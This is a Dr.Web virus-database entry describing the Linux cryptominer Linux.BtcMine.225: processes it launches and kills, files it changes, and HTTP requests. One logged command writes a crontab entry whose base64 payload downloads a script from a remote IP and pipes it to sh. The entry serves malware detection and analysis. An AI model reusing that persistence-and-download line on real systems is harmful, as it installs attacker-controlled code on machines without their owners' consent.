JavaScript support is required for our site to be fully operational in your browser.
Linux.BtcMine.225
Added to the Dr.Web virus database:
2019-02-28
Virus description added:
2019-02-28
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
Launches processes:
sh -c /root/frwfuw brfrwf
sh -c /root/frwfuw
/root/frwfuw
sh -c /root/rmiseg crivtu
/root/rmiseg crivtu
sh -c /root/pwhwwg
/root/pwhwwg
sh -c echo '* * * * * echo -n \"bm9odXAgd2dldCAtTyAtIGh0dHA6Ly8xODUuMTY1LjE2OS42L2QvX3ouc2h8c2ggMj4mMSB8fCBub2h1cCBjdXJsIGh0dHA6Ly8xODUuMTY1LjE2OS42L2QvX3ouanBnfHNoIDI+JjEg\" | base64 -d |sh > /dev/null' | crontab -;
crontab -
sh -c /root/rsfflh
sh -c /root/mwdmhh crmwdm
/root/mwdmhh crmwdm
Kills system processes:
Kills the following processes:
kauditd
systemd-journal
systemd-udevd
kpsmoused
ttm_swap
kvm-irqfd-clean
dhclient
rpcbind
rpc.statd
rpciod
nfsiod
rpc.idmapd
cron
atd
systemd-logind
rsyslogd
acpid
dbus-daemon
agetty
exim4
kworker/0:3
systemd
(sd-pam)
bash
run.sh
Unknown process with PID: 733
/bin/sh
kworker/u2:0
Performs operations with the file system:
Modifies file access rights:
/root/frwfuw
/root/rmiseg
/root/pwhwwg
/root/rsfflh
/root/mwdmhh
Creates or modifies files:
/root/frwfuw
/root/rmiseg
/root/pwhwwg
/root/rsfflh
/var/spool/cron/crontabs/tmp.oq3OAs
/root/mwdmhh
Deletes files:
/root/frwfuw
/root/rmiseg
/root/pwhwwg
/root/rsfflh
/root/mwdmhh
Network activity:
HTTP GET requests:
18#.##5.169.6/d/sss
18#.###.169.6/d/lmmml
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Download Dr.Web for Android
Free three-month trial
All protection features available
Renew your trial license in AppGallery/on Google Pay
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK